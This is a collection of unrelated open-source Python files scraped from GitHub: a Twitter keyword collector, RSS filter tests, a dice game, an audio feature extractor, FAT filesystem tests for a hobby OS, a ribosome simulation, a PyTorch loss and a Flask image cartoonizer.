summary_today_db[0][3]\n , summary_today_db[0][4]\n ])\n\n logger.info('스프레드시트 작성 종료')\n\n # 메일 발송\n send_email_result = send_email.send_email(constant.C_ADMIN_MAIL_ADDRESS, logfile_path)\n\n logger.info(f'메일 발송 결과 : {send_email_result}')\n\nif __name__ == '__main__':\n\n # 현재일시\n now_time = datetime.now()\n file_name = datetime.strftime(now_time, '%y%m%d%H%M%S')\n\n # 로그\n logger = logging.getLogger(\"mainLog\")\n logger.setLevel(logging.INFO)\n loggerHandler = logging.StreamHandler()\n\n formatter = logging.Formatter('%(asctime)s|%(name)s|%(levelname)s:%(message)s')\n loggerHandler.setFormatter(formatter)\n logger.addHandler(loggerHandler)\n\n # Create Handeler == 로깅한 정보가 출력되는 위치 설정\n streamHandler = logging.StreamHandler()\n streamHandler.setLevel(logging.DEBUG)\n streamHandler.setFormatter(formatter)\n # logger.addHandler(streamHandler)\n\n logfile_path = '{}{}log{}{}.log'.format(common.resource_path(''), os.path.sep, os.path.sep, datetime.strftime(now_time, '%y%m%d%H%M%S'))\n # logfile_path = '{}\\log\\{}.log'.format(constant.C_ROOT_PATH, datetime.strftime(now_time, '%y%m%d%H%M%S'))\n\n fileHandler = logging.FileHandler(logfile_path, encoding='utf8')\n fileHandler.setLevel(logging.DEBUG)\n fileHandler.setFormatter(formatter)\n logger.addHandler(fileHandler)\n\n logger.info('----------------------------------------------------------------------------------------------------')\n logger.info(\"start : Search twitter\")\n logger.info('----------------------------------------------------------------------------------------------------')\n\n ### db연결, 커서 획득\n # DB 생성 (오토 커밋)\n conn = sqlite3.connect(common.resource_path('db{}emws.db').format(os.path.sep), isolation_level=None)\n\n # 커서 획득\n db = conn.cursor()\n\n # 테이블 생성 - ALL\n db.execute(\"CREATE TABLE IF NOT EXISTS SNS_EPIMINT \\\n (CAMPAIGN TEXT, COLLECT_AT TEXT, ID TEXT, CREATE_AT TEXT, USER_NAME TEXT, USER_SCREEN_NAME TEXT, TEXT TEXT, FAVORITE_COUNT INTEGER, RETWEET_COUNT INTEGER, HASHTAGS TEXT, SEARCH_QUERY TEXT, REMARK TEXT, PRIMARY KEY(CAMPAIGN, COLLECT_AT, ID))\")\n\n # 캠페인\n campaign = 'twitter'\n\n # Main\n try:\n # 기본 검색어 - 해시태그 포함\n keywordsimple = '에피민트'\n keyword = f'{keywordsimple} OR #{keywordsimple}'\n\n # 확장 검색어 - 리트윗 제외\n keyword_ext = 'AND exclude:retweets'\n # keyword_ext = 'AND exclude:retweets AND filter:quote'\n\n # Full 검색키워드\n full_keyword = f'{keyword} {keyword_ext}'\n\n print(full_keyword)\n\n # 파라미터가 있는지 확인 - 없으면 기본 : '에피민트'\n if len(sys.argv) == 1:\n sys.argv.append(full_keyword)\n else:\n full_keyword = '{} OR #{} {}'.format(sys.argv[1], sys.argv[1], keyword_ext)\n\n # main 호출\n main(full_keyword)\n\n except Exception as inst:\n logger.error(\"error\" + str(inst))\n\n logger.info('----------------------------------------------------------------------------------------------------')\n logger.info(\"end : Search twitter\")\n logger.info('----------------------------------------------------------------------------------------------------')","repo_name":"vntg-esc/emws","sub_path":"main_db.py","file_name":"main_db.py","file_ext":"py","file_size_in_byte":27456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17899315890","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport unittest\n\n\nclass TestFilterRSS(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.instring = \"\"\"header\n1 Sport http://www1.sportschau.de/\n2 Sport http://www.sportschau.de/\n3 Regionalsport http://www.tagesschau.de/ardimport/sport/\n4 Ausland 
http://www.tagesschau.de/ausland/\n5 Inland http://www.tagesschau.de/inland/\n6 Kultur http://www.tagesschau.de/kultur/\n7 Regional http://www.tagesschau.de/ardimport/regional/\n8 Videoblog http://www.tagesschau.de/videoblog/\n9 anderes something-different\n10 Regional2 http://www.rbb-online.de/123\n11 Regionalsport2 http://www.rbb-online.de/sport/345\nfooter\\n\"\"\"\n\n\t\t#array containing the lines of instring\n\t\tself.instringArray=self.instring.split('\\n')\n\t\t\n\t\t#select elements to be in the array\n\t\tself.instringSubArray = lambda t: [self.instringArray[i] for i in t]\n\t\t\n\t\t#no need to select header and footer, convert back to string\n\t\tself.subInstring = lambda t:'\\n'.join(self.instringSubArray([0]+list(t)+[-2, -1]))\n\n\n\tdef test_all(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'alles'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([1,2,3,4,5,6,7,8,9,10,11])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\t\n\n\tdef test_alles_außer_Sport(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'alles-außer-Sport'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([4,5,6,7,8,9,10])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\t\n\n\tdef test_Ausland_Inland_Kultur(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'Kultur', 'Ausland', 'Inland'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([4,5,6])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\n\tdef test_Regional_Videoblog_nonsense(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'Videoblog', 'Regional', 'nonsense'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([7,8,10])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\n\tdef test_anderes(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'anderes'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([9])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\nif __name__ == \"__main__\":\n\t\t\n\tunittest.main()\n","repo_name":"yoook/filterRSS","sub_path":"testFilterTagesschau.py","file_name":"testFilterTagesschau.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30095313298","text":"#Rolling Dice Game\r\nimport random\r\ndef dice_player():\r\n print('Rolling the dice Game! Lets Play')\r\n chance=random.randint(1,2)\r\n if chance==1:\r\n print(\"Welcome Player1! 
Roll dice\")\r\n number1, number2 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number1,number2)\r\n else:\r\n print(\"Welcome Player2! Roll dice\")\r\n number1, number2 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number1,number2)\r\n print('Next Player Roll dice')\r\n number3, number4 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number3,number4)\r\n t,k=max(number1,number2,number3,number4)\r\n r,s=min(number1,number2,number3,number4)\r\n q,p=num_formed(t,r,k,s)\r\n if q==p:\r\n print(\"Match Over\")\r\n elif q>p:\r\n print('Player1 won the match!Congrats')\r\n else:\r\n print('Player2 won the match!Congrats')\r\n print('Again Want to play?Yes or No?')\r\n t=input()\r\n if t=='Yes':\r\n dice_player()\r\n else:\r\n print('Game Finished')\r\ndef max(number1,number2,number3,number4):\r\n if number1>=number2:\r\n max=number1\r\n else:\r\n max=number2\r\n if number3>=number4:\r\n max1=number3\r\n else:\r\n max1=number4\r\n return max,max1\r\ndef min(number1,number2,number3,number4):\r\n if number1<=number2:\r\n min=number1\r\n else:\r\n min=number2\r\n if number3<=number4:\r\n min1=number3\r\n else:\r\n min1=number4\r\n return min,min1\r\ndef num_formed(t,k,r,s):\r\n x=t*10+k\r\n y=r*10+s\r\n return x,y\r\n\r\ndice_player()","repo_name":"shef1011/simple","sub_path":"dice rolling.py","file_name":"dice rolling.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19463922117","text":"# input() liest vom user eingegebene Daten und gibt diese als String zurück\n# int(input()) gibt einen Integer zurück\n# float(input()) gibt floating ponint zurück\nday = int(input())\nmonth = input()\nprint(day , month)\ninput()\n\n# <>\n# user_name = input('Please enter your name: ')\n# print('Hello, ' + user_name)\n# input()\n\n# Eine andere Art den Username abzufragen\nprint('Enter your Name: ')\nuser_name = input()\nprint('Hello, ' + user_name)\ninput()\n\n# Mehrere Werte als Liste eingeben\n# die Werte müssen mit Freizeichen getrennt sein.\n# nach Eingabe des Letzten Wertes kommt Enter\nmylist = [int(n) for n in input().split()]\nprint(mylist)","repo_name":"pyrrhus-ich/Python-Basics","sub_path":"Nachschlagen/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30755156933","text":"import sys\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom emo_classifier import setup_logger\nfrom training import LocalPaths\n\nlogger = setup_logger(__name__)\nlocal_paths = LocalPaths()\nsys.path.append(str(local_paths.project_root))\n\n\ndef download_csv_as_parquet(file_url: str, file_path: Path, **kwargs):\n if file_path.exists():\n logger.info(f\"The file exists. Nothing is downloaded. 
Path = {file_path.relative_to(local_paths.project_root)}\")\n else:\n df = pd.read_csv(file_url, **kwargs)\n logger.info(f\"{file_path.name}: {df.shape[0]} x {df.shape[1]}\")\n df.to_parquet(file_path, index=False)\n\n\ndef download_merged_data_sets():\n base_url = \"https://raw.githubusercontent.com/google-research/google-research/master/goemotions/data/\"\n data_set_types = [\"train\", \"dev\", \"test\"]\n file_urls = (f\"{base_url}{typ}.tsv\" for typ in data_set_types)\n file_paths = (local_paths.dir_datasets / f\"{typ}.parquet\" for typ in data_set_types)\n\n for file_url, file_path in zip(file_urls, file_paths):\n download_csv_as_parquet(file_url, file_path, sep=\"\\t\", header=None, names=[\"text\", \"emotions\", \"id\"])\n\n\ndef download_raw_data_sets():\n base_url = \"https://storage.googleapis.com/gresearch/goemotions/data/full_dataset/\"\n file_name = \"goemotions_%s\"\n\n file_urls = (f\"{base_url}{file_name % i}.csv\" for i in range(1, 4))\n file_paths = (local_paths.dir_datasets / f\"{file_name % i}.parquet\" for i in range(1, 4))\n\n for file_url, file_path in zip(file_urls, file_paths):\n download_csv_as_parquet(file_url, file_path, sep=\",\")\n\n\ndef start():\n download_raw_data_sets()\n download_merged_data_sets()\n","repo_name":"stdiff/emo-classifier","sub_path":"script/ingestion.py","file_name":"ingestion.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27166427940","text":"# -*- coding: utf-8 -*-\n\n\"\"\"VGGish feature extractor.\"\"\"\n\nimport os\nimport pickle\nimport numpy as np\nimport tensorflow.compat.v1 as tf # only tf.v1 in this function\nfrom functools import partial\nimport vggish_input # noqa: E402\nimport vggish_slim # noqa: E402\nimport vggish_params # noqa: E402\nimport vggish_postprocess # noqa: E402\n\nfrom src.features import FeatureExtractor\n\ntf.disable_v2_behavior()\n\n\nclass VGGishExtractor(FeatureExtractor):\n \"\"\"Class for feature extraction with VGGish.\n\n example:\n ex = VGGishExtractor()\n ex.pre_processing(input_paths, output_paths)\n \"\"\"\n\n def __init__(self, logfile=\"./log_vggish\"):\n \"\"\"Init method for VGGishExtractor.\"\"\"\n super().__init__(logfile=logfile)\n self.model_checkpoint = os.path.join(\"./data/vggish_model.ckpt\")\n self.pca_parameters = os.path.join(\"./data/vggish_pca_params.npz\")\n\n def pre_processing(self, input_paths, output_paths, num_workers=1):\n \"\"\"Run VGGish preprocessing.\"\"\"\n paths = list(zip(input_paths, output_paths))\n self.multi_process(self._pre_process, paths, num_workers)\n\n @staticmethod\n def _pre_process(paths):\n \"\"\"Individual VGGish preprocessing process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n features = vggish_input.wavfile_to_examples(\n input_path\n ) # can also do .ogg files\n pickle.dump(features, open(output_path, \"wb\"))\n del features\n\n def embedding(self, input_paths, output_paths):\n \"\"\"Run VGGish embedding.\"\"\"\n paths = list(zip(input_paths, output_paths))\n\n with tf.Graph().as_default(), tf.Session() as sess:\n vggish_slim.define_vggish_slim()\n vggish_slim.load_vggish_slim_checkpoint(sess, self.model_checkpoint)\n\n features_tensor = sess.graph.get_tensor_by_name(\n vggish_params.INPUT_TENSOR_NAME\n )\n embedding_tensor = sess.graph.get_tensor_by_name(\n 
vggish_params.OUTPUT_TENSOR_NAME\n )\n\n func = partial(\n self._embed,\n sess=sess,\n features_tensor=features_tensor,\n embedding_tensor=embedding_tensor,\n )\n\n self.single_process(func, paths)\n\n @staticmethod\n def _embed(paths, sess, features_tensor, embedding_tensor):\n \"\"\"Individual VGGish embedding process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n\n log_mel = pickle.load(open(input_path, \"rb\"))\n\n embedding = np.zeros((log_mel.shape[0], 128))\n\n size = len(log_mel)\n i = 0\n di = 100\n while i <= size:\n\n [embedding_batch] = sess.run(\n [embedding_tensor], feed_dict={features_tensor: log_mel[i : i + di]}\n )\n\n embedding[i : i + di] = embedding_batch\n i += di\n\n pickle.dump(embedding, open(output_path, \"wb\"))\n del embedding\n\n def post_processing(self, input_paths, output_paths, num_workers=1):\n \"\"\"Run VGGish postprocessing.\"\"\"\n paths = list(zip(input_paths, output_paths))\n post_processor = vggish_postprocess.Postprocessor(self.pca_parameters)\n func = partial(self._post_process, post_processor=post_processor)\n self.multi_process(func, paths, num_workers=num_workers)\n\n @staticmethod\n def _post_process(paths, post_processor):\n \"\"\"Individual VGGish postprocessing process.\"\"\"\n input_path, output_path = paths\n input_path_exists, output_path_exists = FeatureExtractor.feature_path_checker(\n input_path, output_path\n )\n\n if input_path_exists and not output_path_exists:\n embedding = pickle.load(open(input_path, \"rb\"))\n postprocessed = post_processor.postprocess(embedding)\n pickle.dump(postprocessed, open(output_path, \"wb\"))\n\n del postprocessed\n del embedding\n","repo_name":"trecpodcasts/podcast-audio-feature-extraction","sub_path":"src/features/VGGishExtractor.py","file_name":"VGGishExtractor.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"34053045656","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTesting FAT filesystem implementation\n\"\"\"\nimport collections\nimport re\nimport subprocess\n\nimport pytest\n\n\ndef make_empty_disk(fileobj, size):\n subprocess.check_call([\n 'dd', 'if=/dev/zero', 'of=' + str(fileobj), 'bs=1M',\n 'count={}'.format(size),\n ])\n\n\ndef add_file(tmpdir, diskfile, dest, contents):\n to_add = tmpdir.join('to_add')\n with to_add.open(mode='w') as f:\n f.write(contents)\n subprocess.check_call([\n 'mcopy', '-i', str(diskfile), str(to_add), dest,\n ])\n to_add.remove()\n\n\ndef add_dir(diskfile, name):\n subprocess.check_call(['mmd', '-i', str(diskfile), name])\n\n\ndef read_file(diskfile, name):\n return subprocess.check_output(['mtype', '-i', str(diskfile), name])\n\n\n@pytest.fixture\ndef f12disk(tmpdir):\n diskfile = tmpdir.join('disk')\n make_empty_disk(diskfile, 4)\n subprocess.check_call([\n 'mformat', '-i', str(diskfile),\n # 512-byte sector, 4 sectors per cluster. This matches what I've been\n # using from mkfs.vfat - it results in a FAT12 disk with 512-byte\n # sectors. 
Obviously, I'd like to be very general, but for now getting\n # functionality with one disk geometry and FS type is a good start.\n '-M', '512', '-c', '4',\n ])\n add_file(tmpdir, diskfile, '::/FILE1.TXT', 'the first file')\n add_file(tmpdir, diskfile, '::/EMPTY.TXT', 'a')\n add_dir(diskfile, '::/DIR')\n add_file(tmpdir, diskfile, '::/DIR/FILE2.TXT', 'the second file')\n yield diskfile\n\n\n@pytest.fixture\ndef fatvm(raw_vm, f12disk):\n raw_vm.start(diskimg=str(f12disk))\n raw_vm.read_until(raw_vm.prompt)\n raw_vm.cmd('exit')\n yield raw_vm\n\n\n@pytest.fixture\ndef devname(fatvm):\n match = re.search(r'blk: registered device \"(.*)\"', fatvm.full_output)\n assert match\n yield match.group(1)\n\n\ndef test_mount(fatvm, devname):\n output = fatvm.cmd(f'fat init {devname}')\n assert 'We determined fstype' in output\n\n\nFile = collections.namedtuple('File', ['type', 'name', 'size'])\n\n\ndef parse_ls(output):\n files = {}\n print(repr(output))\n output = output.strip()\n if output.endswith('\\r\\nksh>'):\n output = output[:-6].strip()\n print(repr(output))\n for line in output.split('\\r\\n')[1:]:\n line = line.strip()\n print(line)\n typ, name, size_parens = line.split(' ', maxsplit=2)\n # (len=X)\n print(size_parens)\n size = int(size_parens[5:-1])\n assert name not in files\n files[name] = File(typ, name, size)\n return files\n\n\ndef assert_has_file(files, name, typ=None, size=None):\n file_ = files.get(name)\n assert file_\n if typ is not None:\n assert file_.type == typ\n if size is not None:\n assert file_.size == size\n\n\n@pytest.fixture\ndef mountvm(fatvm, devname):\n fatvm.cmd(f'fat init {devname}')\n return fatvm\n\n\ndef test_list_root(mountvm):\n output = mountvm.cmd('fs ls /')\n files = parse_ls(output)\n assert len(files) == 3\n assert_has_file(files, 'FILE1.TXT', typ='f')\n assert_has_file(files, 'EMPTY.TXT', typ='f')\n assert_has_file(files, 'DIR', typ='d')\n\n\ndef test_list_other(mountvm):\n output = mountvm.cmd('fs ls /DIR')\n files = parse_ls(output)\n assert_has_file(files, '.', typ='d')\n assert_has_file(files, '..')\n assert_has_file(files, 'FILE2.TXT')\n\n\ndef test_cat_file_root(mountvm):\n output = mountvm.cmd('fs cat /FILE1.TXT')\n assert 'the first file' in output\n\n\ndef test_cat_file_other(mountvm):\n output = mountvm.cmd('fs cat /DIR/FILE2.TXT')\n assert 'the second file' in output\n\n\ndef test_multi_block_file(raw_vm, f12disk):\n # Need to do this test with a raw vm and manually mount, etc, because we\n # will need to \"reboot\".\n vm = raw_vm\n\n def boot(stop=True):\n if stop:\n vm.stop()\n vm.start(diskimg=str(f12disk))\n vm.read_until(vm.prompt)\n\n # Get disk name\n match = re.search(r'blk: registered device \"(.*)\"', vm.full_output)\n assert match\n devname = match.group(1)\n\n # Exit userspace and mount disk\n vm.cmd('exit')\n vm.cmd(f'fat init {devname}')\n\n boot(stop=False)\n\n # Add contents to the file\n string = '1234567890' * 12\n for _ in range(16):\n vm.cmd(f'fs addline /EMPTY.TXT {string}')\n\n # import os\n # os.system(f'cp {str(f12disk)} mydisk')\n # assert False\n\n # At this point, the file is 16 * 121 = 1936 bytes long. Writing one more\n # 121-byte chunk to the file will make it 2057 bytes long, which is just\n # longer than one cluster. 
The correct behavior is to allocate a new\n # cluster, update the FAT for both clusters, and write to the new cluster.\n # This test ensures that it happens both in-memory, and that the FAT\n # changes are properly written to disk so that on subsequent boots (and via\n # mtools) the file contents are properly stored.\n # TODO: the \"empty.txt\" file actually has a single character in it. It\n # turns out that an empty file need not have a block allocated for it (and\n # probably should not). As a result, a truly empty file would have a\n # cluster 0, which my code would take quite literally and have a tough time\n # on.\n vm.cmd(f'fs addline /EMPTY.TXT {string}')\n contents = vm.cmd('fs cat /EMPTY.TXT', rmprompt=True).replace('\\r\\n', '\\n')\n expected = 'a' + (string + '\\n') * 17\n assert contents == expected\n\n boot()\n contents = vm.cmd('fs cat /EMPTY.TXT', rmprompt=True).replace('\\r\\n', '\\n')\n assert contents == expected\n\n contents = read_file(f12disk, '::/EMPTY.TXT').decode('utf-8')\n assert contents == expected\n","repo_name":"brenns10/sos","sub_path":"integrationtests/test_fat.py","file_name":"test_fat.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"81"} +{"seq_id":"40254754748","text":"import json\nimport random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef my_shuffle(arr):\n random.shuffle(arr)\n return arr\n\ndef run_simulation(dt, tsteps, kd_prot, kp_mRNA, kd_mRNA, alpha, beta, q_arr, codon_length, Np_0, Nr_0):\n\n Np_t = np.empty(tsteps, dtype=int)\n Np_t[0] = Np_0\n\n end_occ = np.zeros(tsteps) \n \n Np = Np_0\n Nr = Nr_0\n NmRNA = 0\n mRNAs = np.empty(0)\n for i in range(tsteps-1):\n\n # Simulate mRNA decay\n r_kd_mRNA = random.random()\n if r_kd_mRNA < kd_mRNA*NmRNA*dt:\n remove_idx = random.randint(0,NmRNA-1) # mRNA to remove\n Nr += np.sum(mRNAs[remove_idx,:]) # Add back ribosomes to free bulk\n mRNAs = np.delete(mRNAs, remove_idx, axis=0)\n NmRNA -= 1\n\n # Simulate mRNA production\n r_kp_mRNA = random.random()\n if r_kp_mRNA < kp_mRNA*dt:\n if NmRNA == 0:\n mRNAs = np.append(mRNAs, np.zeros(codon_length))\n mRNAs = np.reshape(mRNAs, (1,-1))\n else:\n mRNAs = np.vstack((mRNAs, np.zeros(codon_length)))\n NmRNA += 1\n \n # Simulate protein decay\n r_decay = random.random()\n if r_decay < dt*kd_prot*Np:\n Np -= 1\n \n # Simulate ribosome dynamics\n for idx in my_shuffle(np.arange(NmRNA)): # Randomize order in which to check mRNAs \n mRNAs[idx,:], Np, Nr = update_occupancy(mRNAs[idx,:], Np, Nr, dt, alpha, beta, q_arr, codon_length)\n\n if NmRNA > 0:\n end_occ[i+1] = np.mean(mRNAs[:,codon_length-1])\n Np_t[i+1] = Np\n\n return Np_t, end_occ\n\ndef update_occupancy(mRNA, Np, Nr, dt, alpha, beta, q_arr, codon_length):\n\n # Check initial occupancy at start and end before any movement\n start_occupied = mRNA[0]\n end_occupied = mRNA[codon_length-1]\n\n # Find indeces of occupied codons except end site and \n # shuffle list for simulation purposes\n occupied_idx = np.where(mRNA[0:codon_length-1] == 1)[0]\n random.shuffle(occupied_idx)\n\n # Simulate movement\n for i in occupied_idx:\n if mRNA[i+1] == 0:\n r_step = random.random()\n if r_step < q_arr[i]*dt:\n mRNA[i] = 0\n mRNA[i+1] = 1\n\n # Allow for attachment and detachment depending on initial occupancy\n if start_occupied == 0:\n r_attach = random.random()\n if r_attach < alpha*Nr*dt:\n mRNA[0] = 1\n Nr -= 1\n \n if end_occupied == 1:\n r_detach = random.random()\n if r_detach < beta*dt:\n 
mRNA[codon_length-1] = 0\n Np += 1\n Nr += 1\n \n return mRNA, Np, Nr\n\ndef get_codon_rates(codon_seq, rates_dict):\n codon_length = int(len(codon_seq)/3)\n\n q_arr = np.empty(codon_length)\n for i in range(codon_length):\n codon = codon_seq[3*i:3*(i+1)]\n q_arr[i] = rates_dict[codon]\n\n return q_arr\n\ndef get_seq_variant(codon_seq, cod_from_amin, amin_from_cod):\n\n var_seq = \"\"\n\n for i in range(0, len(codon_seq), 3):\n codon = codon_seq[i:i+3]\n amin = amin_from_cod[codon]\n possible_codons = cod_from_amin[amin]\n r = random.randint(0, len(possible_codons)-1)\n var_seq += possible_codons[r]\n \n return var_seq\n\n\n\nf = open(\"rates_from_codon.json\", \"r\")\nrate_from_codon = json.load(f)\nf.close()\n\nf = open(\"aminoacid_from_codon.json\", \"r\")\namin_from_cod = json.load(f)\nf.close()\n\nf = open(\"codons_from_aminoacid.json\", \"r\")\ncod_from_amin = json.load(f)\nf.close()\n\n\ncodon_seq = \"AGCGCGCGGUCACAACGUUACUGUUAUCGAUCCGGUCGAAAAACUGCUGGCAGUGGGGCAUUACCUCGAAUCUACCGUCGAUAUUGCUGA\"\n\ncodon_length = int(len(codon_seq)/3)\nn_variants = 100\n\nseq_vars = []\nq_vars = np.empty((n_variants+1, codon_length))\n\nseq_vars.append(codon_seq)\nq_vars[0,:] = get_codon_rates(codon_seq, rate_from_codon)\n\nfor i in range(1, n_variants+1):\n seq_vars.append(get_seq_variant(codon_seq, cod_from_amin, amin_from_cod))\n q_vars[i,:] = get_codon_rates(seq_vars[i], rate_from_codon)\n\n\nkd_prot = 1/1800\nkp_mRNA = 1/600\nkd_mRNA = 1/300\n\ndt = 0.02\ntsteps = 3600 * 3600\nNp_0 = 0\nNr_0 = 4*kp_mRNA/kd_mRNA\n\nbeta = 2\nalpha = 0.9\n\nNp_ts = np.empty((n_variants+1, tsteps))\nend_occs = np.empty((n_variants+1, tsteps))\n\nfor i, q_var in list(zip(range(n_variants+1), q_vars)):\n Np_ts[i,:], end_occs[i,:] = run_simulation(dt, tsteps, kd_prot, kp_mRNA, kd_mRNA, alpha, beta, q_var, codon_length, Np_0, Nr_0)\n\n\nnp.savetxt(\"data/q_vars.txt\", q_vars)\nnp.savetxt(\"data/Np_ts.txt\", Np_ts)\nnp.savetxt(\"data/end_occs.txt\", end_occs)\n\nf_params = open(\"data/params.txt\", \"w\")\nf_params.write(f\"alpha = {alpha}\\n\")\nf_params.write(f\"beta = {beta}\\n\")\nf_params.write(f\"dt = {dt}\\n\")\nf_params.write(f\"tsteps = {tsteps}\\n\")\nf_params.write(f\"variants = {n_variants}\\n\")\nf_params.close()\n\n","repo_name":"Snipersune/DynMod","sub_path":"Lab1/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2362736781","text":"import torch\n\nclass PolarLoss(torch.nn.Module):\n def __init__(self, radius):\n super(PolarLoss, self).__init__()\n self.radius = radius\n\n def forward(self, X, Y):\n '''\n Computes the polar distance between the two points\n :param X:\n :param Y:\n :return:\n '''\n Rx = torch.sqrt(torch.sum(X.reshape(3, 2) * X.reshape(3, 2), dim=1))\n Ry = torch.sqrt(torch.sum(Y.reshape(3, 2) * Y.reshape(3, 2), dim=1))\n\n Tx = torch.atan2(X.reshape(3, 2)[:, 0], X.reshape(3, 2)[:, 1])\n Ty = torch.atan2(Y.reshape(3, 2)[:, 0], Y.reshape(3, 2)[:, 1])\n\n pointwise_loss = torch.sqrt(torch.pow(Ry - Rx, 2) + 2 * self.radius * torch.pow(Ty - Tx, 2))\n\n print(Rx, Ry)\n print(Tx, Ty)\n print(pointwise_loss)\n\n return torch.sum(pointwise_loss, dim=0)\n\n\nif __name__ == '__main__':\n criterion = PolarLoss(432.)\n X = torch.tensor([-385, -2, -385, -2, -385, -2], dtype=torch.float, requires_grad=True)\n Y = torch.tensor([0, 0, 0, 0, 0, 0], dtype=torch.float, requires_grad=True)\n loss = criterion(X, Y)\n print(loss)\n loss.backward()\n print(X, 
Y)\n\n","repo_name":"salmedina/BirdsEyeView","sub_path":"src/losses/PolarLoss.py","file_name":"PolarLoss.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9743846699","text":"import os\r\nfrom flask import Flask, redirect, url_for, request, render_template\r\nfrom catoonizer import *\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n\r\n basepath = os.path.dirname(__file__)\r\n file_path = os.path.join(basepath, 'static', 'uploads',\r\n \"xx.\" + f.filename.split('.')[-1])\r\n\r\n f.save(file_path)\r\n out = cv2.imread(file_path)\r\n out = makecartoon(out)\r\n cv2.imwrite(\r\n os.path.join(basepath, 'static', 'uploads',\r\n \"xxx.\" + f.filename.split('.')[-1]), out)\r\n return redirect(url_for('static',\r\n filename='uploads/' + \"xxx.\" +\r\n f.filename.split('.')[-1]),\r\n code=301)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"yogendra-j/Cartoonizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75179281545","text":"import argparse\nimport time\nimport gc\nimport numpy as np\nimport ray\n\nfrom nums import numpy as nps\nfrom nums.core.array.application import ArrayApplication\nfrom nums.core.array.blockarray import BlockArray\nfrom nums.core.optimizer.cluster_sim import ClusterState\nfrom nums.core.optimizer.comp_graph import GraphArray\nfrom nums.core.optimizer.tree_search import RandomTS\nfrom nums.core.systems.filesystem import FileSystem\nfrom nums.core.systems.gpu_systems import (\n NumpySerialSystem,\n CupySerialSystem,\n NumpyRaySystem,\n CupyRaySystem,\n TorchCPURaySystem,\n TorchGPURaySystem,\n 